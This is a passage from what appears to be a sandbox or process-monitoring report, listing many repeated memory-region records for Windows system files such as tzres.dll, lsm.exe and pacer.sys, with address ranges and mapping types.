"tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3407 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3408 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3409 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3410 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3411 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3412 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3413 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3414 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3415 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3416 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3417 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3418 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3419 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3421 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3422 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3423 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3424 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3425 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3426 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3427 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3428 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3429 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3430 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3431 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3432 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3433 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3434 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3435 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3436 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3437 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3438 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3439 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3440 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3441 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3442 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3443 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3444 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3445 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3446 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3447 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3448 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3450 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3451 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3452 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3453 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3454 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3455 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3456 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3457 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3458 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3459 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3460 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3461 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3462 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3463 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3464 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3465 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3466 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3467 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3468 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3469 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3470 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3471 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3472 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3473 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3474 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3475 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3476 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3477 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3479 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3480 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3481 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3482 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3483 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3484 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3485 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3486 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3487 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3488 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3489 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3490 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3491 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3492 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3494 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3495 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3496 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3497 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3498 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3499 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3500 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3501 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3502 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3503 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3504 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3505 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3506 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3507 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3508 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3509 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3510 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3511 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3512 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3513 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3514 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3515 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3516 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3517 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3543 start_va = 0xb20000 end_va = 0xb21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3544 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3546 start_va = 0xb50000 end_va = 0xb55fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3548 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3549 start_va = 0xb50000 end_va = 0xb55fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3550 start_va = 0xb30000 end_va = 0xb83fff monitored = 0 entry_point = 0xb43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3552 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3553 start_va = 0xb30000 end_va = 0xb83fff monitored = 0 entry_point = 0xb43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3554 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3555 start_va = 0xb30000 end_va = 0xb50fff monitored = 0 entry_point = 0xb4a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3559 start_va = 0xb60000 end_va = 0xb63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3561 start_va = 0xb30000 end_va = 0xb50fff monitored = 0 entry_point = 0xb4a06c region_type = mapped_file name = "pacer.sys" filename = 